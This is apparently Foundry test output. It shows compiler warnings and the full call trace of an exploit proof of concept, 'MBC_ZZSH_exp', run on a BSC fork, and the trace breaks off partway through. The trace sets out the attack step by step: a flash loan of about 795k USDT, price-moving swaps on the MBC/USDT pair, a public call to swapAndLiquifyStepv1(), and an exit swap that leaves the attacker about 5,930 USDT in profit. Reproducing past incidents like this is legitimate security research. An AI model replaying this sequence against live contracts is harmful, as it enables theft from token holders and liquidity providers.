Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.30s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-11/MBC_ZZSH_exp.sol:22:5:
   |
22 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/MBC_ZZSH_exp.sol:50:31:
   |
50 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/MBC_ZZSH_exp.sol:50:47:
   |
50 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/MBC_ZZSH_exp.sol:50:67:
   |
50 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/MBC_ZZSH_exp.sol:50:88:
   |
50 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 904.25ms (1.85ms CPU time)

Ran 1 test for src/test/2022-11/MBC_ZZSH_exp.sol:ContractTest
[PASS] testExploit() (gas: 818691)
Logs:
  [End] Attacker USDT balance after exploit: 5930.678886576313268612

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 23474460 [2.347e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [850691] ContractTest::testExploit()
    ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24661] 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24661] 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A) [staticcall]
    │   └─ ← [Return] 794994271783747229185351 [7.949e23]
    ├─ [721713] 0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A::flashLoan(0, 794994271783747229185351 [7.949e23], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [27971] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 794994271783747229185351 [7.949e23])
    │   │   ├─ emit Transfer(from: 0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 794994271783747229185351 [7.949e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0xe15794f9863f61e2b79c6824f1e1c5aa8ab443721329bf1566a811b7d14c4bd5: 0x00000000000000000000000000000000000000000000a858b9cfef253bd9f547 → 0
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000a858b9cfef253bd9f547
    │   │   └─ ← [Return] true
    │   ├─ [667405] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 794994271783747229185351 [7.949e23], 0x00)
    │   │   ├─ [9651] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(150000000000000000000000 [1.5e23], [0x55d398326f99059fF775485246999027B3197955, 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17]) [staticcall]
    │   │   │   ├─ [2893] 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 12475110456913920021663 [1.247e22], 10976748888389080860664 [1.097e22], 1669705943 [1.669e9]
    │   │   │   └─ ← [Return] [150000000000000000000000 [1.5e23], 11622466224903562048186 [1.162e22]]
    │   │   ├─ [8071] 0x55d398326f99059fF775485246999027B3197955::transfer(0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, 150000000000000000000000 [1.5e23])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, value: 150000000000000000000000 [1.5e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000a858b9cfef253bd9f547 → 0x00000000000000000000000000000000000000000000889535a41d34ca19f547
    │   │   │   │   @ 0xb5303f590a82f3c05edb9949cb8b0cc025272ef9840150390efb6864fc2df717: 0x0000000000000000000000000000000000000000000002530cfdecae871447f8 → 0x0000000000000000000000000000000000000000000022169129be9ef8d447f8
    │   │   │   └─ ← [Return] true
    │   │   ├─ [124225] 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1::swap(11622466224903562048186 [1.162e22], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [89721] 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 11622466224903562048186 [1.162e22])
    │   │   │   │   ├─ emit Transfer(from: 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, to: 0x000000000000000000000000000000000000dEaD, value: 348673986747106861443 [3.486e20])
    │   │   │   │   ├─ emit Transfer(from: 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, to: 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17, value: 464898648996142481924 [4.648e20])
    │   │   │   │   ├─ emit Transfer(from: 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, to: 0xb926F44596D1FE4323C2dC207097FcEf5A94Cac7, value: 116224662249035620481 [1.162e20])
    │   │   │   │   ├─ emit Transfer(from: 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10692668926911277084252 [1.069e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x0b6dfc6f8b12ff29ff11def45e4812ab10e31e0a18c3cb01fed8f8f1e846a212: 0x0000000000000000000000000000000000000000000000002224b22a43fc0d8a → 0x00000000000000000000000000000000000000000000001955e87c49da118f8e
    │   │   │   │   │   @ 0xb34209a263f6c38fe55f099e9e70f9d67e93982480ff3234a5e0108028ad164d: 0x000000000000000000000000000000000000000000000033b058bb22ae9ecc1b → 0x000000000000000000000000000000000000000000000046972b92ba5f2eed9e
    │   │   │   │   │   @ 0xac87cb553e58297d4265ae776c34c4a51c4e02b95334b50ecc7a456eef4d3744: 0x0000000000000000000000000000000000000000000000113abc66babf9f4409 → 0x00000000000000000000000000000000000000000000001787ad5942a524a48a
    │   │   │   │   │   @ 0xb5303f590a82f3c05edb9949cb8b0cc025272ef9840150390efb6864fc2df717: 0x0000000000000000000000000000000000000000000002a446ef9098633c549f → 0x00000000000000000000000000000000000000000000002e38d0d382bb22a23b
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000243a69728d67beeae5c
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [664] 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17::balanceOf(0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1) [staticcall]
    │   │   │   │   └─ ← [Return] 852644232010357973563 [8.526e20]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1) [staticcall]
    │   │   │   │   └─ ← [Return] 160976748888389080860664 [1.609e23]
    │   │   │   ├─ emit Sync(reserve0: 852644232010357973563 [8.526e20], reserve1: 160976748888389080860664 [1.609e23])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 86, amount1In: 150000000000000000000000 [1.5e23], amount0Out: 11622466224903562048186 [1.162e22], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 9: 0x00000000000000000000000000012ee248299828f235524d894f8d3fabc675ea → 0x00000000000000000000000000012ee2901a9cb599beca798e3f00861b2adb27
    │   │   │   │   @ 10: 0x0000000000000000000000000000000ce4683437947fcee192621dc8d4d6c3b5 → 0x0000000000000000000000000000000d41545a55c37dfc5b4900ec491ff89219
    │   │   │   │   @ 8: 0x6385b0d70000000002530cfdecae871447f80000000002a446ef9098633c549f → 0x6386029a0000000022169129be9ef8d447f800000000002e38d0d382bb22a23b
    │   │   │   └─ ← [Stop]
    │   │   ├─ [115628] 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17::swapAndLiquifyStepv1()
    │   │   │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x4E87880A72f6896E7e0a635A5838fFc89b13bd17) [staticcall]
    │   │   │   │   └─ ← [Return] 8910121517374895634224 [8.91e21]
    │   │   │   ├─ [103254] 0x10ED43C718714eb63d5aA57B78B54704E256024E::addLiquidity(0x55d398326f99059fF775485246999027B3197955, 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17, 8910121517374895634224 [8.91e21], 467358936187192577934 [4.673e20], 0, 0, 0x77bAC6826BD30E01c5dF4C0810B1e01F2AdaecB4, 1669726874 [1.669e9])
    │   │   │   │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x55d398326f99059fF775485246999027B3197955, 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1
    │   │   │   │   ├─ [893] 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 852644232010357973563 [8.526e20], 160976748888389080860664 [1.609e23], 1669726874 [1.669e9]
    │   │   │   │   ├─ [13634] 0x55d398326f99059fF775485246999027B3197955::transferFrom(0x4E87880A72f6896E7e0a635A5838fFc89b13bd17, 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, 8910121517374895634224 [8.91e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17, to: 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, value: 8910121517374895634224 [8.91e21])
    │   │   │   │   │   ├─ emit Approval(owner: 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 99990016166507403782538005 [9.999e25])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x0b6dfc6f8b12ff29ff11def45e4812ab10e31e0a18c3cb01fed8f8f1e846a212: 0x0000000000000000000000000000000000000000000001e304c6983497293730 → 0
    │   │   │   │   │   │   @ 0xb5303f590a82f3c05edb9949cb8b0cc025272ef9840150390efb6864fc2df717: 0x0000000000000000000000000000000000000000000022169129be9ef8d447f8 → 0x0000000000000000000000000000000000000000000023f995f056d38ffd7f28
    │   │   │   │   │   │   @ 0xdbff3c89a716302f1ea466b3acf8f129006bc988fcddb4064a710e194972a9b9: 0x00000000000000000000000000000000000000000052b798a808d4213e177a45 → 0x00000000000000000000000000000000000000000052b5b5a3423beca6ee4315
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [15786] 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17::transferFrom(0x4E87880A72f6896E7e0a635A5838fFc89b13bd17, 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, 47194167920290574428 [4.719e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17, to: 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, value: 47194167920290574428 [4.719e19])
    │   │   │   │   │   ├─ emit Approval(owner: 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 99998682958039450164972810 [9.999e25])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xdbff3c89a716302f1ea466b3acf8f129006bc988fcddb4064a710e194972a9b9: 0x00000000000000000000000000000000000000000052b78e061a6d5e821afd66 → 0x00000000000000000000000000000000000000000052b78b77270fb0eb0ccd0a
    │   │   │   │   │   │   @ 0x0b6dfc6f8b12ff29ff11def45e4812ab10e31e0a18c3cb01fed8f8f1e846a212: 0x00000000000000000000000000000000000000000000001955e87c49da118f8e → 0x000000000000000000000000000000000000000000000016c6f51e9c43035f32
    │   │   │   │   │   │   @ 0xb5303f590a82f3c05edb9949cb8b0cc025272ef9840150390efb6864fc2df717: 0x00000000000000000000000000000000000000000000002e38d0d382bb22a23b → 0x000000000000000000000000000000000000000000000030c7c431305230d297
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [61036] 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1::mint(0x77bAC6826BD30E01c5dF4C0810B1e01F2AdaecB4)
    │   │   │   │   │   ├─ [664] 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17::balanceOf(0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 899838399930648547991 [8.998e20]
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 169886870405763976494888 [1.698e23]
    │   │   │   │   │   ├─ [2354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0ED943Ce24BaEBf257488771759F9BF482C39706, value: 4686200232667967754 [4.686e18])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x77bAC6826BD30E01c5dF4C0810B1e01F2AdaecB4, value: 632669642148061983731 [6.326e20])
    │   │   │   │   │   ├─ emit Sync(reserve0: 899838399930648547991 [8.998e20], reserve1: 169886870405763976494888 [1.698e23])
    │   │   │   │   │   ├─ emit Mint(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 47194167920290574428 [4.719e19], amount1: 8910121517374895634224 [8.91e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xce5a46cd565c798db4579e1721082d7b4156f14a385995b283ae5d8d572faf65: 0x000000000000000000000000000000000000000000000000599bb87732d2a2c2 → 0x0000000000000000000000000000000000000000000000009aa472bfa95993cc
    │   │   │   │   │   │   @ 0x61f91a122b84e596ba92f2771c25decf80e0053a0280aced8062e7e3e4418a3e: 0x000000000000000000000000000000000000000000000015e3bf2ee3632d2dc8 → 0x0000000000000000000000000000000000000000000000382fcd4664fbea61bb
    │   │   │   │   │   │   @ 8: 0x6386029a0000000022169129be9ef8d447f800000000002e38d0d382bb22a23b → 0x6386029a0000000023f995f056d38ffd7f28000000000030c7c431305230d297
    │   │   │   │   │   │   @ 11: 0x00000000000000000000000000062395edc37ab01c29946ac35c3cabd5e158ce → 0x0000000000000000000000000006dadeb29e7737da89f7be9b4574aa8854d098
    │   │   │   │   │   │   @ 0: 0x00000000000000000000000000000000000000000000026b61d6d1acc0ccb64b → 0x00000000000000000000000000000000000000000000028deeeda376d010db48
    │   │   │   │   │   └─ ← [Return] 632669642148061983731 [6.326e20]
    │   │   │   │   └─ ← [Return] 8910121517374895634224 [8.91e21], 47194167920290574428 [4.719e19], 632669642148061983731 [6.326e20]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, 1001)
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, value: 1001)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb5303f590a82f3c05edb9949cb8b0cc025272ef9840150390efb6864fc2df717: 0x0000000000000000000000000000000000000000000023f995f056d38ffd7f28 → 0x0000000000000000000000000000000000000000000023f995f056d38ffd8311
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000889535a41d34ca19f547 → 0x00000000000000000000000000000000000000000000889535a41d34ca19f15e
    │   │   │   └─ ← [Return] true
    │   │   ├─ [664] 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 10692668926911277084252 [1.069e22]
    │   │   ├─ [30371] 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17::transfer(0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, 10692668926911277084252 [1.069e22])
    │   │   │   ├─ [465] 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1::token0() [staticcall]
    │   │   │   │   └─ ← [Return] 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17
    │   │   │   ├─ [397] 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1::token1() [staticcall]
    │   │   │   │   └─ ← [Return] 0x55d398326f99059fF775485246999027B3197955
    │   │   │   ├─ [893] 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 899838399930648547991 [8.998e20], 169886870405763976494888 [1.698e23], 1669726874 [1.669e9]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1) [staticcall]
    │   │   │   │   └─ ← [Return] 169886870405763976495889 [1.698e23]
    │   │   │   ├─ [664] 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17::balanceOf(0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1) [staticcall]
    │   │   │   │   └─ ← [Return] 899838399930648547991 [8.998e20]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 320747989800557578566 [3.207e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17, value: 427663986400743438088 [4.276e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xb926F44596D1FE4323C2dC207097FcEf5A94Cac7, value: 106915996600185859522 [1.069e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, value: 9836271687217099076024 [9.836e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xac87cb553e58297d4265ae776c34c4a51c4e02b95334b50ecc7a456eef4d3744: 0x00000000000000000000000000000000000000000000001787ad5942a524a48a → 0x00000000000000000000000000000000000000000000001d536f45b3f617d24c
    │   │   │   │   @ 0x0b6dfc6f8b12ff29ff11def45e4812ab10e31e0a18c3cb01fed8f8f1e846a212: 0x000000000000000000000000000000000000000000000016c6f51e9c43035f32 → 0x00000000000000000000000000000000000000000000002df5fcd06186d0163a
    │   │   │   │   @ 0xb5303f590a82f3c05edb9949cb8b0cc025272ef9840150390efb6864fc2df717: 0x000000000000000000000000000000000000000000000030c7c431305230d297 → 0x000000000000000000000000000000000000000000000246017529e96995444f
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000243a69728d67beeae5c → 0x0000000000000000000000000000000000000000000000000ed6cc92dcf0ce94
    │   │   │   │   @ 0xb34209a263f6c38fe55f099e9e70f9d67e93982480ff3234a5e0108028ad164d: 0x000000000000000000000000000000000000000000000046972b92ba5f2eed9e → 0x000000000000000000000000000000000000000000000057fa71580e520876e4
    │   │   │   └─ ← [Return] true
    │   │   ├─ [893] 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 899838399930648547991 [8.998e20], 169886870405763976494888 [1.698e23], 1669726874 [1.669e9]
    │   │   ├─ [664] 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17::balanceOf(0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1) [staticcall]
    │   │   │   └─ ← [Return] 10736110087147747624015 [1.073e22]
    │   │   ├─ [5111] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(9836271687217099076024 [9.836e21], [0x4E87880A72f6896E7e0a635A5838fFc89b13bd17, 0x55d398326f99059fF775485246999027B3197955]) [staticcall]
    │   │   │   ├─ [893] 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 899838399930648547991 [8.998e20], 169886870405763976494888 [1.698e23], 1669726874 [1.669e9]
    │   │   │   └─ ← [Return] [9836271687217099076024 [9.836e21], 155615250870445917394455 [1.556e23]]
    │   │   ├─ [18502] 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1::swap(0, 155615250870445917394455 [1.556e23], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 155615250870445917394455 [1.556e23])
    │   │   │   │   ├─ emit Transfer(from: 0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 155615250870445917394455 [1.556e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000889535a41d34ca19f15e → 0x00000000000000000000000000000000000000000000a989211282f11bc2c775
    │   │   │   │   │   @ 0xb5303f590a82f3c05edb9949cb8b0cc025272ef9840150390efb6864fc2df717: 0x0000000000000000000000000000000000000000000023f995f056d38ffd8311 → 0x000000000000000000000000000000000000000000000305aa81f1173e54acfa
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [664] 0x4E87880A72f6896E7e0a635A5838fFc89b13bd17::balanceOf(0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1) [staticcall]
    │   │   │   │   └─ ← [Return] 10736110087147747624015 [1.073e22]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x5b1Bf836fba1836Ca7ffCE26f155c75dBFa4aDF1) [staticcall]
    │   │   │   │   └─ ← [Return] 14271619535318059101434 [1.427e22]
    │   │   │   ├─ emit Sync(reserve0: 10736110087147747624015 [1.073e22], reserve1: 14271619535318059101434 [1.427e22])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 9836271687217099076024 [9.836e21], amount1In: 1001, amount0Out: 0, amount1Out: 155615250870445917394455 [1.556e23], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x6386029a0000000023f995f056d38ffd7f28000000000030c7c431305230d297 → 0x6386029a000000000305aa81f1173e54acfa000000000246017529e96995444f
    │   │   │   └─ ← [Stop]
    │   │   ├─ [9611] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(150000000000000000000000 [1.5e23], [0x55d398326f99059fF775485246999027B3197955, 0xeE04a3f9795897fd74b7F04Bb299Ba25521606e6]) [staticcall]
    │   │   │   ├─ [2893] 0x33CCA0E0CFf617a2aef1397113E779E42a06a74A::getReserves() [staticcall]
